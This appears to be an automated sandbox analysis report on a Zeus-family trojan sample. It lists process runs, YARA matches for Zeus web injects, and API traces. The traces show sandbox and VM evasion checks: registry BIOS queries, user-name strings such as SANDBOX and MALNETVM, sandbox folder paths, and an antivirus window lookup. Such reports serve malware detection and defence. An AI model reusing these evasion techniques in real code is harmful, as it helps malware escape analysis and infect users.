                                                                                                                                                                                                          Start time:12:24:42
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                          Start time:12:24:44
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                          Start time:12:24:44
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                          Start time:12:24:45
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                          Start time:12:24:47
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                          Start time:12:24:47
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                          Start time:12:24:50
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                          Start time:12:24:50
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                          Start time:12:24:52
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe"
                                                                                                                                                                                                          Imagebase:0xee0000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1991998066.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                          Start time:12:24:53
                                                                                                                                                                                                          Start date:11/11/2024
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712
                                                                                                                                                                                                          Imagebase:0x550000
                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:1.1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:64.6%
                                                                                                                                                                                                            Total number of Nodes:246
                                                                                                                                                                                                            Total number of Limit Nodes:11

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                              • Part of subcall function 00403900: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                              • Part of subcall function 00403900: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                              • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                              • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                              • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                              • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                              • Part of subcall function 00403900: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                              • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$PnEw$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-3887202299

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 129 403900-403948 RegOpenKeyExA 130 40394a-40396d RegQueryValueExA 129->130 131 4039ad-4039e5 GetUserNameA CharUpperA strstr 129->131 134 40397b-40398c RegCloseKey 130->134 135 40396f-403979 RegCloseKey 130->135 132 403acb 131->132 133 4039eb-4039fe strstr 131->133 137 403acc-403ad2 132->137 133->132 136 403a04-403a17 strstr 133->136 134->131 138 40398e-403995 134->138 135->131 136->132 140 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 136->140 138->131 139 403997-40399e 138->139 139->131 141 4039a0-4039a7 139->141 140->132 142 403a5d-403a62 140->142 141->131 141->137 142->132 143 403a64-403a69 142->143 143->132 144 403a6b-403a70 143->144 144->132 145 403a72-403a77 144->145 145->132 146 403a79-403aa3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403aa5-403ab5 StrStrIA 146->147 147->132 148 403ab7-403ac7 StrStrIA 147->148 148->132 149 403ac9 148->149 149->132
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 150 4020b0-4021fe CreateFileA 151 402230-402235 150->151 152 402200-40222a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 153 401a30-401a45 154 401b53-401b59 153->154 155 401a4b-401a58 call 4010a0 153->155 155->154 158 401a5e-401a69 RtlImageNtHeader 155->158 159 401b31-401b45 GetProcessHeap HeapValidate 158->159 160 401a6f-401a90 GetTickCount GetModuleHandleA 158->160 159->154 161 401b47-401b4d GetProcessHeap HeapFree 159->161 162 401a92-401aa0 GetProcAddress 160->162 163 401aa9-401ac4 160->163 161->154 162->163 164 401aa2 162->164 163->159 165 401ac6-401ae7 CreateFileA 163->165 164->163 165->159 166 401ae9-401b01 WriteFile 165->166 167 401b03-401b04 SetEndOfFile 166->167 168 401b0a-401b13 166->168 167->168 168->159 169 401b15-401b22 GetHandleInformation 168->169 169->159 170 401b24-401b28 169->170 170->159 171 401b2a-401b2b CloseHandle 170->171 171->159
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 004010A0: CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                              • Part of subcall function 004010A0: RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                              • Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
                                                                                                                                                                                                              • Part of subcall function 004010A0: ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                              • Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                              • Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                              • Part of subcall function 004010A0: CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                              • Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401A77
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AF9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 00401B04
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401B2B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401B3D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401B4D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocateCountHeaderImageModuleProcReadSizeTickmemset
                                                                                                                                                                                                            • String ID: '+@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 444222748-2605303930

Control-flow Graph
• Function starting at 004010a0 (graph figure not reproduced; executed/not-executed colouring lost in extraction)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401114
                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
